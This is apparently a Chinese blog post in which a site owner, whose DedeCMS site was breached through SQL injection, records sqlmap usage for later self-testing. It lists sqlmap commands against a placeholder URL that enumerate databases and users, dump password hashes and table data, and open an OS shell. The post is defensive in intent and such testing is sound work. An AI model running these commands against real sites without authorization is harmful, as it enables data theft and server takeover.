可怕的注入工具sqlmap

最新推荐文章于 2024-04-10 11:05:57 发布
最新推荐文章于 2024-04-10 11:05:57 发布
阅读量1.1k 收藏 1
点赞数 1
分类专栏: 漏洞 mysql php 文章标签: php 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/skfzc/article/details/50264753
版权
php 同时被 3 个专栏收录
73 篇文章 0 订阅
订阅专栏
mysql
12 篇文章 0 订阅
订阅专栏
漏洞
1 篇文章 0 订阅
订阅专栏

之前做的一个站,是用的织梦系统,里面加了一点自己的代码,由于很简单的东西,没做sql防注入,结果结果爆出漏洞了,用的是sqlmap,以前没怎么太关注过注入这一块,这回可是领教了,记录下这个东西的使用方法,以备以后检测网站用:

./sqlmap.py –h     //查看帮助信息
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere”  //get注入
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --data “DATA”//post注入
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --cookie “COOKIE”//修改请求时的cookie
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” --dbs   //列数据库
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-users //列用户
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-passwords //获取密码hash
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables  -D DB_NAME //列DB_NAME的表
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-columns –T TB_NAME -D DB_NAME  //读取TB_NAME中的列
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-dump –C C1,C2,C3 –T TB_NAME -D DB_NAME //读字段C1,C2,C3数据
./sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-os-shell  //取得一个shell
skfzc
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试 ( 6 ) --- SQL 注入神器 sqlmap
墨鱼菜鸡
07-11 2963
sqlmap 官网:http://sqlmap.org/ sqlmap文档地址:https://github.com/sqlmapproject/sqlmap/wiki/Usage sqlmap 使用 思维导图:http://download.csdn.net/detail/freeking101/9887831 黑帽与白帽都喜爱的十大SQL注入工具:...
Sqlmap工具
学习、分享、交流
05-29 1353
sqlmap工具:专门用于sql注入漏洞的。
sqlmap进行SQL注入
weixin_45095113的博客
03-16 519
sqlmap跑SQL注入
sql注入原理及各姿势sqlmap使用(1),膜拜大牛
最新发布
2301_76348014的博客
04-10 927
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
sql注入危害利用及防护详解+sqlmap使用
m0_54024658的博客
09-18 3088
来自于个人日常学习总结,欢迎大家一起来学习交流,如要转载请标明出处。 sql注入危害 数据库信息泄露 网页篡改: 通过操作数据库对网页进行篡改,嵌入木马连接 数据库被恶意操作:被攻击、管理员账户被更改 服务器被远程控制 : 黑客可以修改和控制系统 种植木马 : 使系统瘫痪 注入的本质/原理 用户输入的数据被当做语句执行(通过将恶意的sql查询或添加语句插入到应用的输入参数中,带入到sql服务器执行这些攻击语句) sql注入出现的地方 内部角度: url传参 表单post cookie user-agent
Xpath注入
2202_75361164的博客
12-04 364
Xpath注入,常规使用加例题
sqlmap sql 注入测试工具
03-06
sqlmap 可以很方便的测试sql 注入 安装后直接使用
sql注入工具sqlmap
06-16
sqlmap是一个自动化的sql注入渗透工具,指纹检测、注入方式、注入成功后的取数据等等都是自动化的,甚至还提供了一个字典来将取回来的hash爆破,是ctf sql注入题的必备帮手
SQLmap注入工具
09-20
sqlmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, ...
exe版sqlmap注入工具
07-26
exe版sqlmap注入工具,无需python环境,直接使用,使用方法跟原版sqlmap一样
sql注入工具sqlmap源代码+常用指令
04-09
SQLMap是一款流行的开源SQL注入工具,用于自动化检测和利用Web应用程序中的SQL注入漏洞。它可以测试目标站点是否存在SQL注入漏洞,并探测数据库类型、操作系统、表名、列名等信息,进而将这些信息自动化地利用来获取...
注入神器sqlmap
11-11
自从我拥有了sqlmap 我再也不需要其他注入工具了 感觉他真是万能的 和burpsuit一起用没有什么过不了
xpath工具zip版本
08-20
XPath即为XML路径语言(XML Path Language),它是一种用来确定XML文档中某部分位置的语言。 XPath基于XML的树状结构,提供在数据结构树中找寻节点的能力。起初XPath的提出的初衷是将其作为一个通用的、介于XPointer与XSL间的语法模型。但是XPath很快的被开发者采用来当作小型查询语言。
php xpath注入工具,[原创]WEB安全第五章 漏洞学习与利用 18xpath注入与盲注入
weixin_32006353的博客
04-07 164
WEB安全第五章 漏洞学习与利用 18xpath注入与盲注入1、什么是xpath注入XPath是一种查询语言,它描述了如何在XML文档中查找特定元素(包括属性、处理指令等)。既然是一种查询语言,XPath在一些方面与SQL相似,不过,XPath的不同之处在于它可以用来引用XML文档的几乎任何部分,而不受访问控制限制。在SQL中,一个“用户”(在XPath/XML上下文中未定义的术语)的权限被限制在...
php xpath注入工具,XPath注入攻击学习
weixin_39622289的博客
04-07 278
XPath简介XPath 是一门在 XML 文档中查找信息的语言,用于在 XML 文档中通过元素和属性进行导航XPath语法XPath中的符号XPath的数学运算符+ 加号表示加- 表示数字相减* 表示乘以div 表示除以,这里数学上的除号/已经被用作节点之间分隔符了mod 表示取余XPath逻辑运算符= 等于!= 不等于> 大于>= ...
php xpath注入工具,科普:XPATH注入
weixin_39926943的博客
04-07 379
用这个网站做示例Defaulthttp://91ri.org/ newsdetail.php?id=511http://91ri.org/ newsdetail.php?id=511.查看数据库版本?(ExtractValue)代码:Default+and+extractvalue(rand(),concat(0x7e,version()))--1+and+extractvalue(rand(),...
beescms网站渗透测试和修复意见
TKXS
12-27 5768
beescms网站渗透测试 目录 1.环境搭建 2.渗透前信息收集 3.开始渗透 Beescms实验环境搭建 1、官方下载Beescms v4.0,下载地址: http://beescms.com/cxxz.html 2、解压压缩文件,然后把文件放到phpstudy的网站根目录 3、浏览器访问http://127.0.0.1/beescms/install,开始安装 4、一直下一步,出现如下界面,输入数据库账户密码 5、成功安装 6、修改mysql.ini 文件,在mysqld 下添加条目: secu
sqlmap之sql注入(一)
m0_55313512的博客
02-27 5620
SQL注入(一)
SQLmap的基础使用.pptx
11-27
主要从一下几个方面进行了讲解: 一.SQLmap安装 Sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定url的sql注入漏洞,内置了很多绕过插件,支持的数据库是MYSQL、Oracle、postgreSQL、Microsoft SQL server、Microsoft Access、IBM DB2、SQLite、Firebird、sydbase、SAP MaxDB。 二.sqlmap入门 假定目标注入点是http://127.0.0.1/sqli/Less-1/?id=1,判断其是否存在注入的命令如下: Sqlmap.py –u http://127.0.0.1/sqli/Less-1/?id=1 如果觉得需要按[Y/n]选择,如果不想选择,让它自动选择默认执行可以在参数后面加上--batch Sqlmap.py –u http://127.0.0.1/sqli/Less-1/?id=1 --batch 三.SQLmap进阶:参数讲解 参数 –level 5指需要执行的测试等级,一共有5个等级(1-5),可以不用加level,默认是1.sqlmap使用pay

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值